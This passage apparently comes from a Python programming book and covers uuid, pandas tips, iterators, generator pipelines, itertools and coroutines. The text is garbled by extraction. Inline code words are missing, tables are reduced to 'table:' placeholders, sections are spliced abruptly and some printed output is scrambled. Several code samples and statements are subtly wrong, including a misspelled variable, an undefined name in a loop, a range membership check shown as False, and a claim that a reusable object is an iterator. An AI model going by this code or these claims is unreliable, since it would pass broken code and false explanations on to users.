>>> import uuid >>> uuid.uuid4() UUID('3e3ef28d-3ff0-4933-9bba-e5ee91ce0e7b')

>>> uuid.uuid4() UUID('2e115fcb-5761-4fa1-8287-19f4ee2877ac')

The nice thing is that all of uuid’s functions produce an instance of the UUID class, which encapsulates the ID and has properties like and

>>> tok = uuid.uuid4() >>> tok.bytes b'.\xb7\x80\xfd\xbfIG\xb3\xae\x1d\xe3\x97\xee\xc5\xd5\x81'

>>> len(tok.bytes)

16

>>> len(tok.bytes) * 8  # In bits 128

>>> tok.hex '2eb780fdbf4947b3ae1de397eec5d581'

>>> tok.int 62097294383572614195530565389543396737

You may also have seen some other variations: and The key difference between these and uuid4() is that those three functions all take some form of input, and therefore don’t meet the definition of random to the extent that a Version 4 UUID does: uuid1() uses your machine’s host ID and current time by default. Because of the reliance on current time down to nanosecond resolution, this version is where UUID derives the claim “guaranteed uniqueness across time.” uuid3() and uuid5() both take a namespace identifier and a name. The former uses an MD5 hash and the latter uses SHA-1.

conversely, is entirely pseudorandom (or random). It consists of getting 16 bytes via converting this to a big-endian integer, and doing a number of bitwise operations to comply with the formal specification.

One issue that can happen here is collisions. A collision would simply refer to generating two matching UUIDs. What is the chance of that? Well, it is technically not zero, but perhaps it is close enough: there are 2 ** 128 or 340 undecillion possible uuid4 values. I will leave it up to you to judge whether this is enough of a guarantee to sleep well. One common use of uuid is in Django, which has a UUIDField that is often used as a primary key in a model’s underlying relational database.

Bonus pointers

After all the features and optimizations that we have covered in this chapter, I am sure you will have gained some instincts on how to use the power of Pandas to your advantage. Listed here are some additional pointers that you may already know, but the usage shown here can make the life of a data scientist quite easy.

select_dtypes: When a table is being read, default data types are assigned to each of the columns. Dataframes provide you with a way to check the inferred types. You can also lookup all possible data types in the dataframe, for which, we can try the following:

df.dtypes.value_counts()

In case you want to selectively view the columns for a few specific data types, you can use the select_dtypes method.

df.select_dtypes(include=['float64', 'int64'])

This will return a sub-dataframe that contains only numerical values. map: This is a cool command to do easy data transformations. You first define a dictionary with ‘keys’ being the old values and ‘values’ being the new values.

level_map = {1: 'high', 2: 'medium', 3: 'low'} df['c_level'] = df['c'].map(level_map)

Sample Use Case: False to 1, 0 (for modeling); defining levels; user defined lexical encodings.

Percentile groups: If you want to classify a column with numeric data into groups of percentiles, then you can make use of the You can also achieve the same behaviour by using numpy, as follows:

import numpy as np cut_points = [np.percentile(df['c'], i) for i in [50, 80, 95]] df['group'] = 1 for i in range(3): df['group'] = df['group'] + (df['c'] < cut_points[i]) # or >> marks = [21, 32, 43, 55, 67] >>> studentsNum = (14, 25, 37) >>> text = "monty python"

What is specific to sequences, include the following:

These are indexed and the index starts with zero and ends with the length of the sequence less one.

These have fixed lengths. They can be sliced.

All the examples of strings, tuples, or lists follow these conventions.

>>> marks[0] 21 >>> studentsNum[2] 37 >>> text[4] 'y'

One thing to note here is that not every iterable in Python will be a sequence. For example, Dictionaries, Generators, Sets, and Files can all be looped through as iterables, but they are not sequences, as they do not satisfy the preceding criteria.

>>> dummy_set = {21, 32, 43} >>> another_set = (number**2 for number in dummy_set) >>> dummy_dict = {'key1': 'val1', 'key2': 'val2'} >>> dummy_file = open('some_file.txt')

Lists, Strings, and Tuples are sequences since they have indexes starting at 0, they are of fixed length, and they can be sliced. Dictionaries, Sets, Files, and Generators are not. However, they are all iterables.

for loops – under the hood

Have you ever wondered how loops in Python handle the iteration of different kinds of iterables and still provide a consistent API? While iterating over a sequence, you can use the indexes that are created automatically while initializing the sequence values.

ages = [11, 32, 43, 15, 67] index = 0 while index < len(ages): print(ages[index]) index = index + 1

Now, if we try the same approach for let’s say, a set, the following exception will be thrown by the interpreter:

>>> singers = {'Adele', 'justin', 'ariana', 'mozart'} >>> index = 0 >>> while index < len(singers): …     print(singers[index]) …     index = index + 1 … Traceback (most recent call last): File "", line 2, in TypeError: 'set' object does not support indexing

We see that since sets do not fall under the sequence banner, they do not have indices. Python uses iterators for looping over these types which are not sequences. Let us see how that works. Consider the three iterables that we had discussed earlier for a set, tuple, and string respectively:

>>> marks = [21, 32, 43, 55, 67] >>> studentsNum = (14, 25, 37)

>>> text = "monty python"

An iterator can be retrieved for these data types with the help of the iter() built-in function in Python. Irrespective of the iterable type being passed, the return type is always an Iterator. In [4]: iter(marks) Out[4]: at 0x22ad245fd60> In [5]: iter(studentsNum) Out[5]: at 0x22ad3f6fd90> In [6]: iter(text) Out[6]: at 0x22ad38d5070>

Now, using these iterators, the built-in next() method can be invoked to churn out the next element in the data structure.

>>> heights = [18, 12, 33] >>> ht_iterator = iter(heights) >>> next(ht_iterator)

18 >>> next(ht_iterator) 12

Python iterators are stateful in nature, meaning they persist the current state of execution and once an item is returned, it will not be encountered again, unless the iterator is re-initialized. Explicitly invoking the next() method on an iterator that has exhausted its contents will raise the StopIteration exception. In [5]: next(ht_iterator) Out[5]: 33

In [6]: next(ht_iterator) ---------------------------------------------------------------StopIteration                             Traceback (most recent

call last) in ----> 1 next(ht_iterator) StopIteration:

Think of Iterators as toothpaste tubes. Once you have squeezed out a value, you cannot put it back in. And once you have exhausted the toothpaste, the tube has practically no use.

Iterators are iterables

It is worth noting again that every iterator in Python is also an iterable and it can be looped over. However, you can also use an iterator to get another iterator from itself.

>>> integers = [11, 22, 33] >>> iter1 = iter(integers) >>> iter2 = iter(iter1) >>> iter1 is iter2 True

Iterators return their own instance back when you call on them with the iter() method. Also, iterators by themselves are also iterables, although they lack the extensive features that iterables have.

Iterators are dynamic objects and they do not have a pre-defined length, thereby you cannot index an iterator.

>>> integers = [71, 62, 53, 45, 37] >>> intIter = iter(integers) >>> len(intIter)

TypeError: object of type 'list_iterator' has no len()

>>> intIter[1] TypeError: 'list_iterator' object is not subscriptable

Iterators can be considered as lazy iterables, which are meant for a single use on every instantiation. Not all iterables are iterators, but all iterators are iterables. A brief of all the possible cases are mentioned in the following table:

table: table: table: table:

table: table:

Table 7.2: Comparison of Iterators and Iterables

Python 2.x compatibility

This book focuses on Python 3.x for most of the code and features discussed. However, when talking about iterators that are class based, some of the following architectural differences need to be kept in mind:

The next value in the iterator is retrieved using the __next__() method in Python 3. For achieving the same operation in Python 2, the method used is the next() method.

The question in consideration here is about the backward compatibility in production code. So, if you want to enable the same code to work for both Python 2 and Python 3, you have to avoid any confusions in the difference in names. Let’s take a look at an approach that you can follow to ensure this compatibility.

The simplest way to achieve this is to implement both the methods in the class:

class DemoProcess(object): def __init__(self, argument): self.data = argument

def __iter__(self ): return self

def __next__(self ): return self.value

# For compatibility with Python 2: def next(self ): return self.__next__()

So, you see that we have created an alias for the next() method, which automatically redirects to the __next__ method. This will make your code independent of Python versions. Also, note that the class is deriving from the base object class, so that a newstyle class is instantiated for Python 2, which is a widely accepted practice for compatibility.

Iterator chains

This is another interesting feature of Python that I first encountered at a PyCon by David Beazley and it seemed to catch on. Using multiple iterators, one can create robust and efficient pipelines for processing data. These are known as iterator chains and are constructed using generators in Python. In this section, we will be looking at how to construct these iterator chains and use them for more powerful application code. Now generators and generator expressions help to wipe out a ton of boilerplate code that is required for creating iterators based on classes, and can therefore be referred to as syntactic sugar for iterator creation.

Generators result in a sequence or stream of values during the course of their lifetime. Take the following simple example that maintains a counter and returns every consecutive even number when the generator is invoked:

def even_numbers(): for index in range(0, 20): if index%2 == 0: yield index

If we now try to execute this on an iPython terminal, the following behaviour is observed:

>>> even_chain = even_numbers()

>>> list(even_chain) [0, 2, 4, 6, 8, 10, 12, 14, 16, 18]

That was simple. Let us dig deeper. Python allows you to redirect the stream, resulting from the even_chain generator into another generator that applies a different operation on the values and generates a new output stream of values. Thus, you will be connecting these operations into a chain or a directed graph. To illustrate this, let’s say you want to get the double of the resultant values from the preceding generator:

def even_double(sequence): for index in sequence: yield 2 * index What you have now created is a chain of generators – visualize the data streams flowing through each yield statement creating a pipeline. If you execute the preceding code, you will see the following output:

>>> even_double_nums = even_double(even_numbers()) >>> list(even_double_nums) [0, 4, 8, 12, 16, 20, 24, 28, 32, 36]

We can keep adding multiple entities to this chain in order to accomplish many more related tasks in a predefined manner. It is important to note that these chains are unidirectional when it comes to data flow and the language has well defined interfaces to shield every task in the chain. You can think of this as writing piped bash commands in UNIX to redirect the output of one command as the input of another.

Let us now add another step to the pipeline to convert each value into the cumulative value of the sequence in the pipeline and see what happens:

def cumulative(sequence): sum_till_now = 0 for index in sequence: sum_till_now += index yield sum_till_now

The chain of iterators now will have a new task for getting the cumulative value at each index of the sequence and return the value. To see this in action, let’s execute the following:

>>> cumulative_vals = cumulative(even_double(even_numbers())) >>> list(cumulative_vals) [0, 4, 12, 24, 40, 60, 84, 112, 144, 180] The chain finally looks like the following:

Figure 7.1: Chain of iterators example There are the following two things that I find interesting about this technique of chaining generators: The start to end processing takes place one element at a time from the sequence or steam of values. There is no intermediate buffering after the chain tasks, therefore such chains would usually operate using O(1) space in memory (although the generators would take up some space in the stack and heap). You can introduce more complex operations in the form of tasks, and retain the performance and efficiency of the pipeline since every task will relate to a generator entity with its own welldefined unit of work. Let us now discuss a way in which we can create a more concise version of this pipeline with negligible compromise on the readability of the code using generator expressions: # Using Generator Expressions even_numbers = (x for x in range(0, 20) if x%2 == 0) even_double = (2 * x for x in even_numbers) # Regular Generator function

def cumulative(): sum_till_now = 0 for index in even_double: sum_till_now += index yield sum_till_now Notice how we have replaced each processing step in the chain with a generator expression built on the output of the previous step. This code is equivalent to the chain of generators that we built throughout the chapter: In [24]: even_numbers Out[24]: generator object at 0x000001F2CD116900> In [25]: even_double Out[25]: generator object at 0x000001F2CD1DF7B0> In [26]: list(even_double) Out[26]: [0, 4, 8, 12, 16, 20, 24, 28, 32, 36] In [26]: cumulative Out[26]: __main__.cumulative(sequence)> In [27]: # NOTE: Create the even_number and # even_double generator expressions once more to # execute the below line, since we already exhausted # them. Remember Single-Use only. In [28]: list(cumulative())

Out[28]: [0, 4, 12, 24, 40, 60, 84, 112, 144, 180] We see that by using generator expressions, we have simplified the final call to this pipeline to only call the final generator function.

Generator expressions will simplify the code, but you can’t pass function arguments to them, or use them more than once in the same pipeline.

Therefore, we see that by using a combination of generator functions and generator expressions, we are able to create a performant pipeline. The combination of both culminates into a robust and more readable pipeline of tasks.

Creating your own iterator

Python not only gives you several useful iterators to use, it also gives the developer the power to create their own iterators and lazy iterables. Let us illustrate this feature with the help of an example of an iterator that accepts an iterable of integers and results in a sequence of ‘doubled’ values when you loop over it.

class get_doubles: def __init__(self, integers): self.integers = iter(integers)

def __next__(self ): return next(self.integers) * 2

def __iter__(self ): return self

Now, we can create an instance of this class and loop over it. We will be using the count API in the Itertools library to generate the input for it.

>>> from itertools import count >>> inetgers = count(20)

>>> doubles = get_doubles(integers)

>>> next(doubles) 40

>>> next(doubles) 42

Therefore, this is one way of creating the needed iterators. However, a simpler way to create iterators that will be used in your day-to-day operations is to define a generator function. However, when you need more complexity and modularity in your iterators, choose the class based implementation. # Alternate implementation based on functions.

def get_doubles(integers): for index in integers: yield 2*index The preceding implementation works essentially in the same way as the class based iterator. Another method to create your own iterator could be with the help of a generator expression. def get_doubles(integers): return (2*index for index in integers) Notice how the syntax of the expression is similar to that of list comprehensions. Lazy iterables can be implemented with all the three techniques, however, the simplest and the most direct approach is to use generator functions and expressions, and

consider the class based iterators for more complex and modular iterators.

Improve code with lazy iterables

Now that we have learnt about lazy operations with iterables, let’s use this section to discuss how to create different helper methods that can assist in creating effective loops using iterables for data processing.

Lazy summation

Suppose you have the data of every on-the-hour worker in a project and the number of billable hours that they spent working on the project in a database. The information queried needs to be filtered for the chargeable events by only those employees who are on the payroll and the total time spent on the project has to be computed. The simplest way to add up these individual times would be the following: # The Regular Way billable_hours = 0 for employee in all_employees: if employee.on_payroll(): billable_hours += employee.time_spent

We can achieve the same logic using a generator expression which will now enable it to be lazily evaluated:

# The Pythonic Way all_times_spent = ( employee.time_spent for employee in employees if employee.on_payroll() )

billable_hours = sum(all_times_spent)

The differences are subtle but it can prove to be effective in the end for maintaining a healthy code base:

We could now give an appropriate name to the logic for the ease of identification.

We could now use the built-in sum() function, since we have an iterable, which will have a better performance than manually running these operations.

You can fundamentally alter the structure of code to a more robust one with the help of iterators.

Lazy breaking out of loops

Suppose you are logging several lines that you want to read and process using a Python method up to the 10th line. The simplest contents of this method could be like the following:

# The Regular Way for index, content in enumerate(file_reference): if i >= 150: break print(content)

We can achieve similar results with the help of the lazy loading generators. For this specific use case, we will be using the islice() generator defined in the Itertools package.

# The Pythonic Way from itertools import islice

lines_iterator = islice(file_reference, 150)

for lineContent in lines_iterator: print(lineContent) Therefore, we first create a generator that can loop through the required number of lines that is now named as lines_iterator,

unlike earlier. Hence, the second approach makes the code descriptive and enhances the readability. Also, notice that you do not have to worry about the break statement in the code anymore, which is inherently handled by the generator.

There are several iteration specific helper functions in the itertools Python standard library. Several other third party packages also exist, the likes of more-itertools or boltons, which provide enhanced functionality for iterations.

Creating your own iteration helpers

We saw how and where to use the iteration helper functions from the external or internal libraries. However, it is not too difficult to create our own set of iteration helpers. Let us illustrate this with the help of a use case for finding the deltas for a sequence of numbers:

# The Regular Way time_diff = [] prev_time = all_call_times[0] for curr_time in all_call_times[1:]: time_diff.append(curr_time – prev_time) prev_time = curr_time

Can you think of what all is lacking with this piece of code? Take a look at the following:

An additional variable is being used in each iteration of the loop.

The usage is restricted to sliceable objects like lists or sequences. The code will not work for generators, or any other iterators. So, how can we make this better in terms of performance and versatility? Let us try to implement this with the help of generator functions. First, we define a generator, itemize, that gets the next element from the sequence for processing:

def itemize(iterable): """Yield (prev_time, curr_time) for every iterable item.""" iterator = iter(iterable) prev_time = next(iterator) for curr_time in iterator: yield prev_time, curr_time

prev_time = curr_time

We simply get the iterator from our iterable, retrieve the items using and keep track of the previously encountered item at each step. You might have noticed that this method looks similar to the previous implementation. However, with generators, this function can work with all kinds of iterables, and is not limited to sequences only. time_diff = [] for prev_time, curr_time in itemize(all_call_times): time_diff.append(curr_time – prev_time)

Isn’t this more pleasing to the eye? No additional variables to deal with. The itemize generator tracks the changes in items and we have managed to modularize the core code. The usage is compact and can even be replaced with a list comprehension. time_diff = [(curr_time – prev_time) for prev_time, curr_time in itemize(all_call_times)]

Differences between lazy iterable and iterables

Anything that can be looped over is an iterable in Python.

If the entity that is being looped over is computing the elements while looping, it is referred to as a lazy iterable. If the object can be passed to the next() method to retrieve the subsequent values, it is an example of an iterator.

On the other hand, if the same object can be repeatedly used and the values are not exhausted, you can say it is an iterator. Note that the range object in Python 3 is not an iterator. It is simply a lazy object instance. If you call next() on the range object, it will result in an error:

In [1]: range_obj = range(20) In [2]: print(next(range_obj)) TypeError: 'range' object is not an iterator.

The range object in Python 3 is not an iterator.

I have heard many people, from novice to experienced Python developers using the word iterator for teaching the concept of ranges. This becomes confusing and can mislead developers.

The range object is a lazy object implementation – it does not contain any predefined values, but only yields the values as and when the loop needs them. A range object and a generator (which is an iterator) are defined as follows: >>> integers = range(1_000) >>> doubles = (2*index for index in integers)

One difference to keep in mind that acts as an identifier for the iterators vs the lazy objects like range is that a range has a predefined length, while the iterators do not:

>>> len(integers) 1000

>>> len(doubles) Traceback (most recent call last): File "", line 1, in TypeError: object of type 'generator' has no len()

The other difference is that iterators cannot be indexed, while the range object can be indexed and allows random access.

>>> integers[-3] 997

>>> doubles[-3] Traceback (most recent call last): File "", line 1, in TypeError: 'generator' object is not subscriptable

Thirdly, you can also query for the existence of a particular entity in the range, and the underlying object is not modified. In iterators, querying for existence will change the underlying object. >>> 98 in integers True >>> 98 in integers True >>> 98 in doubles True

>>> 98 in integers False

Therefore, range objects are not exactly fitting into the iterator categorization. We can refer to them as lazy sequences which are basically implemented using sequences like tuples, strings, or lists, but they do not store anything in memory. Rather, they derive the values computationally when required.

The itertools library

Iterators are a powerful concept in Python and this is extended with several API libraries. The Itertools module comes built-in and houses several interesting functions, which together form the ‘iterator algebra’, to be used to make your code elegant and performant. In other words, Itertools have functions that operate on iterators to create iterators that are more complex. The example of the sequence-based generator is similar to the itertools.count() method. In this section, we will take a glimpse into some additional functionality provided by the itertools module.

Let us consider from a previous example where we want to parse the values of the employees’ billable hours, but now only for those employees who are over the age of 40. The regular approach to this problem would be to use a conditional in the loop:

# … def get_total_time(self ): for employee in self.employees: if employee.age > 40: … This is what most novice programmers would do. However, think about it – what if the threshold value changes? How do we pass the new value? In addition, there may be cases when the

condition itself might change in the future. How do we accommodate for such changes in a lesser intrusive manner? The preceding code is considered rigid, which is usually a sign of bad code.

On the other hand, we do not want to overload this object with too many customizations as coupling it to external factors would lose the essence of its core functionality. So where else can we address these additional functionalities?

For the sake of reusability, we will be ensuring that the object is independent of the user or clients and thereby keep it modular. So, rather than modifying the code, we will be working on ensuring that the input data is filtered as per the requirements of the class’s users. As per the preceding example, if we want to filter the data based on the employee’s age being greater than 40, we will apply the following: from itertools import islice employees = islice(filter(lambda e: e.age > 40, employees), 10) hours = EmployeeStats(employees).get_total_time() # … This implementation has no memory overhead, since being built with generators, they follow a lazy approach for evaluation. This is specifically helpful for filtering large datasets that cannot be placed in memory all at once.

Other common itertools features

Of the several features that Itertools houses, some of the most common features that I find particularly useful in writing better code every day are listed as follows:

The accumulate function: This function accumulate(iterable[, func, *, initial=None]) creates an iterator which returns the accumulated results from a function taking 2 arguments (binary) and takes in the func as an argument. This might seem confusing initially, however, let’s see it in action with an example:

>>> records = [520, -250, -207, -120, -200, -320] >>> int_rate = 2.073 >>> for record in itertools.accumulate( records, lambda cost, advance: cost*int_rate + advance): …     print(record)

520 827.96 1509.3610800000001 3008.9055188400002 6037.4611405553205 12195.65694437118

The groupby function: The function, groupby(iterable, accepts as an input, an iterable and optionally a key, which decides how to group the elements in the iterable. This requires the elements to be sorted as a prerequisite for appropriate grouping. Let us take an example to illustrate this – say some new employees join the organisation, and need to be grouped based on their Last Names for better crowd management on the first day. The following code shows how the groupby() clause is used to achieve the desired results.

>>> new_emps = ['D Hardman', 'H Spector', 'J Pearson', 'L Litt', 'S Cahill', 'A Hall'] >>> grouped_emps = {}

>>> key_with_names = lambda n: n.split()[-1][0] >>> new_emps_sorted = sorted(new_emps, key=key_with_names)

>>> for initial, grp_names in itertools.groupby( new_emps_sorted, key=key_with_names): grouped_emps[initial] = list(grp_names) >>> grouped_emps {'C': ['S Cahill'], 'H': ['D Hardman', 'A Hall'], 'L': ['L Litt'], 'P': ['J Pearson'], 'S': ['H Spector']}

The combinations function: The function, combinations(iterable, expects as inputs, an iterable and a integer value for length, and creates and returns the subsequence of the sequence that have a length of The returned values are in tuples, and it preserves the original order of the elements in the tuple. As an example, let’s try to solve how to generate the different combinations from a given set of coins with different denominations:

>>> def coin_change(set_of_coins, length): …    change_possible_for = set() …    for coin_subset in itertools.combinations( set_of_coins, length): …        change_possible_for.add(sum(coin_subset)) …    return sorted(change_possible_for) >>> coin_change([2, 5, 10, 1, 5, 1, 5], 3)

[4, 7, 8, 11, 12, 13, 15, 16, 17, 20] >>> coin_change([5, 1, 10, 10, 2, 5, 2], 4) [10, 13, 14, 15, 18, 19, 21, 22, 23, 24, 26, 27, 30] The product function: The function product(*iterables, generates the Cartesian product of one or more iterables. This is equivalent to a single construct that replaces multiple nested for loops. You use the repeat argument when you want to pass multiple instances of the same iterable, i.e. product with itself. As an

example, let us say you play a game where you have to pick the first and last names for a celebrity from two different lists. The possibility of the names can be found from the product of the following two lists:

>>> celeb_fnames = ['Robert', 'Chris', 'Tom'] >>> celeb_lnames = ['Downey', 'Evans', 'Cruise'] >>> for full_name in itertools.product(celeb_fnames, celeb_lnames): …    full_name = " ".join(full_name) …    initials = "".join((n[0] for n in full_name)) …    print(f 'Possible Name: {full_name}') Possible Name: Robert Downey Possible Name: Robert Evans Possible Name: Robert Cruise Possible Possible Possible Possible

Name: Name: Name: Name:

Chris Downey Chris Evans Chris Cruise Tom Downey

Possible Name: Tom Evans Possible Name: Tom Cruise The permutations function: The function permutations(iterable, returns fixed length permutations, when an iterable and a length is given. If no length is specified, the permutations of all the lengths are generated. The behaviour of this function is nearly the

same as that of the combinations() method, except that in this case, the order of the elements matters. >>> integers = [10, 22] >>> print(list(itertools.combinations(integers, 2))) [(10, 22)] >>> print(list(itertools.permutations(integers, 2))) [(10, 22), (22, 10)] Wherever possible, we should try using these functions instead of implementing our own versions, as they have been particularly optimized for handling the complex iteration requirements.

Generators

Generators are simplified iterators

By now, we are familiar with what generators and iterators are. We now look at how some specific scenarios can be optimized with the help of generators and iterators.

Repeated iterations

Sometimes, explicit definitions for repeated iterations can be avoided by the help of generators. One such example would be to use the tee() method from the itertools module:

def get_all_stats(emp_times): min_times, max_times, avg_times = itertools.tee(emp_times, 3) return (min(min_times), max(max_times), median(avg_times))

Here, the itertools.tee() will replicate the iterable into three new iterables, each of which will be used for different operations. So, the key point to remember here is that, if you feel there is a requirement to loop over the same iterable more than once, think about using the itertools.tee() function.

Nested loops

After repetition, let us talk about dimensions – sometimes, the lookup for elements might require expanding the search across multiple dimensions, especially with the help of nested loops as the simplest approach. When a search is successful, break statements are needed in every level of the nested loops to terminate the execution.

Therefore, how do we go about making this more optimal – we look for ways to flatten the execution into a single for loop. An example is presented as follows:

# The Regular Way def nested_search(elem_list, search_val): location = None for x, elem_row in enumerate(elem_list): for y, elem_cell in enumerate(elem_row): if elem_cell == search_val: location = (x, y) break

if location is not None: break

if location is None: raise ValueError(f "{search_val} not found")

logger.info("Search successful - %r found at [%i, %i]", search_val, *location) return location

A more compact approach to solving this without using many checks or flags in the code would be as follows:

# The Pythonic Way def _search_matrix(matrix): for x, elem_row in enumerate(matrix): for y, elem_cell in enumerate(elem_row): yield (x, y), elem_cell

def search(matrix, search_val): try: location = next( location for (location, elem_cell) in _search_matrix(matrix) if elem_cell == search_val ) except StopIteration: raise ValueError("{search_val} not found") logger.info("Search successful - %r found at [%i, %i]", search_val, *location) return location

You should note here that the auxiliary generator that we created, fulfilled the requirement for iteration. This abstraction can be extended into more levels or dimensions of iteration where needed, and the client or end user would not need to know about the underlying mechanism. The Iterator design pattern in Python provides inherent support for iterator objects and is therefore, transparent in nature.

Try to simplify the iteration as much as possible with as many abstractions as are required, flattening the loops whenever possible.

Using generators for lazily loading infinite sequences

Let’s consider the cases when the sequence in consideration is either infinite in nature or when we have to generate a sequence which is a result of complex calculations at every step, and we don’t want the user to be waiting while these operations happen, this warrants a perfect use case for generators.

Note than in Python, generators are a specialized co-routine whose return type is an iterable. Because its current state is always saved in memory, every subsequent step kicks off from where we left off. The following are examples of how generators can be used to alleviate the preceding situations:

The regular

def filter_stream_by_phrase(phrase): magic_tweet_api = MagicTweetAPI() if magic_tweet_api.stream_data_exists_for(phrase): return magic_tweet_api.get_stream(phrase)

# # # #

The method returns the stream data till the point it is invoked. You have to call the above method repeatedly whenever you need more entries. Not Ideal!!

stream_data = filter_stream_by_phrase('#thepythonicway')

for tweet in stream_data: apply_operations(tweet)

# The second use case can be represented by a pseudo # python code like this def process_dataset(dataset): return [complex_computation_one(dataset), complex_computation_two(dataset),

complex_computation_three(dataset),]

The Pythonic def filter_stream_by_phrase(phrase): magic_tweet_api = MagicTweetAPI() while magic_tweet_api.stream_data_exists_for(phrase): yield magic_tweet_api.get_stream(phrase) # As a generator, now the function can be run # continuously using less resources and in the client # code, we can infinitely loop till a termination # signal is received. for tweet in filter_stream_by_phrase('#thepythonicway'): if termination_signal_received: break apply_operations(tweet)

# For the second use case, using yield will keep # computations limited to only the current step

def process_dataset(dataset): yield complex_computation_one(dataset) yield complex_computation_two(dataset) yield complex_computation_three(dataset)

Prefer generator expressions to list comprehensions for simple iterations This applies to situations when you want to iterate through a sequence and at each stage, a simple operation needs to be performed. A simple example to consider for this case is when you want to iterate through a list of names, and you want to turn the names to camel case, that is, capitalize the first letter.

A simple way everyone would think of is to build the updated sequence and iterate in place. A list comprehension seems like the way to go here. Let’s try out generators for a change here and see what happens.

List comprehensions generate the objects first and fills them in. When the size of the list is very large, this turns out to be intensive in terms of computations and resources. Generators work on-demand and help contain the amount of resources utilized. Imagine if you want to run the program for the names of all the books in the library, the list comprehensions would blow up the memory usage, while generators will not even cause a blip.

The regular for book in [book.upper() for book in retrieve_all_book_names()]: index_book(book)

The Pythonic

for book in (book.upper() for book in retrieve_all_book_names()): index_book(uppercase_name)

Coroutines

In the previous sections, we have discussed generator objects that implement the __next__ and __iter__ methods. Every generator object can be iterated over and can also be used in conjunction with the next() method to move in steps.

Apart from these, some other methods are used to make them perform as coroutines (PEP-342). The evolution of coroutines from generators for handling asynchronous programming will be explored in this section, following which, we will be looking at some of the details of the efficiently performing asynchronous programming.

The methods introduced in PEP-342 are as follows:

.close()

.throw(ex_type[, ex_value[, ex_traceback]])

.send(value)

Generator interface methods

In this section, let us dive deeper into the syntax, operation, and usage of the methods outlined earlier. This will enable to construct simple efficient coroutines.

Post that, we can look into some of the more complex and practical uses of coroutines, also referred to as sub-generators – like refactoring of code along with the orchestration of various coroutines.

The close() method

As the name suggests, this method aids in the termination of the generator or to handle a finishing status. When invoked, it raises the GeneratorExit exception. This needs to be handled; else, the generator terminates and stops the dependent iteration process.

Resource management, when applicable to your co-routine, can be handled by catching this exception and thereby releasing the handles. You can relate it to how the finally block in the try… except construct works, or how the context managers operate, that is, explicitly handle the termination with the help of this Exception.

A common use case in data oriented teams would be connecting to databases. Say you are writing code for initiating a connection with a database, and using it to query from it in fixed size result sets, instead of all together.

def fetch_db_data(db_conn): try: while True: yield db_conn.fetch_records(25) except GeneratorExit: db_conn.close()

Every invocation of this generator fetched 25 entries from the database in a batch and returns. When we no longer want to

keep fetching the values, the close() method needs to be invoked on the generator for gracefully terminating the connection to the database that was persisted.

>>> datagen = fetch_db_data(DBConnection("sampledStats")) >>> next(datagen)

[(0, 'dataPoint I'), (1, 'dataPoint II'), (2, 'dataPointIII'), …]

>>> next(datagen) [(0, 'dataPoint I'), (1, 'dataPoint II'), (2, 'dataPoint III'), …] >>> datagen.close() INFO: terminating database connection 'sampledStats'

Use the close() method on generators for performing finish-up tasks when needed.

The throw() method

The purpose of this method is to raise an exception at the point of suspension of the generator. If handled, relevant except clauses will be invoked, else, the caller of the generator object will propagate the Exception.

Let us modify the example from the previous section to highlight how this operates and how the coroutine handles or does not handle this example: class SpecificException(Exception): pass

def fetch_db_data(db_conn): while True: try: yield db_conn.fetch_records(25) except SpecificException as ex: print("This is an expected error %r, resuming…", ex) except Exception as ex: print("This is an unexpected error %r, Stopping…", ex) db_conn.close() break

Now, we have defined a SpecificExeption class and are handling this separately, since we do not want to terminate the program

execution but simply log the error in detail.

>>> datagen = fetch_db_data(DBConnection("sampledStats"))

>>> next(datagen) [(0, 'dataPoint I'), (1, 'dataPoint II'), (2, 'dataPoint III'), …]

>>> next(datagen) [(0, 'dataPoint I'), (1, 'dataPoint II'), (2, 'dataPoint III'), …]

>>> datagen.throw(SpecificException) This is an expected error SpecificException(), resuming… [(0, 'dataPoint I'), (1, 'dataPoint II'), (2, 'dataPoint III'), …] >>> datagen.throw(RuntimeError) This is an unexpected error RuntimeError(), Stopping… INFO: terminating database connection 'sampledStats' Traceback (most recent call last): … StopIteration This handled the custom exception where we simply wanted to inform and continue, as well as other generic exceptions. However, even then, the termination was gracefully handled and the iteration was stopped, which is evident from the StopIteration exception that was raised.

The send(value) method

Here is where things get interesting. In the previous example, we are using a generator to retrieve the database values in batches of a fixed lot. However, this value is fixed during the runtime of the generator. What is it that you want to change during the course of invocation of the generator? The next() method does not possess the functionality to pass in the parameters out of the box. That is where the send() method of the coroutine comes into the picture: def fetch_db_data(db_conn): fetched_data = None last_batch_sz = 25 try: while True: batch_sz = yield fetched_data if batch_sz is None: batch_sz = last_batch_sz last_batch_sz = batch_sz fetched_data = db_conn.fetch_records(batch_sz) except GeneratorExit: db_conn.close() We have now configured the coroutine for accepting the values that are sent to it in runtime with the help of the send() method.

The usage of send() is how coroutines differ from regular generators, since now the yield keyword is used in the RHS of the expression, and the ‘yielded’ value is stored in a variable or an object.

The coroutines support the usage of yield on the right hand side of an assignment expression, as evident from the following example:

fetched_value = yield producer_value Let us discuss how this works. The function of yield here is bifold – one, it will propagate the producer_value back to the caller, which will be recognized in a following iteration round, once next() has been invoked – and two, during the course of the execution, the caller might want to send a value as parameter to the coroutine, with the help of the send method, which in turn becomes the output of the yield statement and is stored in the Note that you can only send a value to the coroutine when it is in the suspended state, waiting to yield the next value. This means that you cannot use this on the first invocation of a generator – you will have to use the next() method at least once to make it start generating values and enter a suspended state. Otherwise, it will cause an exception to be thrown, as is evident from the following:

In [1]: myCoroutine = SomeCoroutine() In [2]: myCoroutine.send(10) Traceback (most recent call last): … TypeError: can't send non-None value to a just-started generator

You cannot use the send() method on the first invocation of the generator. You have to use next() at least once to be able to send the values to it using the method.

In the example that we started with, we have updated it to accept the batch size that needs to be fetched from the database in an iteration. On invoking next() once, we advance to the yield line, a None is returned and the generator is suspended.

If we call next() again, the default initial value of the batch size is used – which translates to next() being equivalent to However, if we invoke with a send(), the next read from the database will use the valid_value as the new batch size. This change can now happen at any point during the invocation of the coroutine.

Given that Python encourages clean, compact code, we will see how we can update the previous example to be written in a better manner:

def fetch_db_data(db_conn): fetched_data = None batch_sz = 25 try: while True: batch_sz = (yield fetched_data) or batch_sz fetched_data = db_conn.fetch_records(batch_sz) except GeneratorExit: db_conn.close() This is much clearer – the brackets used with the yield explain that we are comparing the generated result with the previous value.

As mentioned earlier, the only catch is that we have to advance the coroutine with a next() before we can use the send() method on it. However, this is Python, and this is where miracles can happen. The first call seems like something many novice developers are prone to miss – so how can we make it run in a seamless manner so that we can use the send on the generator directly after creation?

Remember decorators? An interesting way to achieve this is to create a decorator that prepares your coroutine to be used after creation by advancing the coroutine. The usage of it would look like the following: @prep_coroutine def fetch_db_data(db_conn): fetched_data = None

